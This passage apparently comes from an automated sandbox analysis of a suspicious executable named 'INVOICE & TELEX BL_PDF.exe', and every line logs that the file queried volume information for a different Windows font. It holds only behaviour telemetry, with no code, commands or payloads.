                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
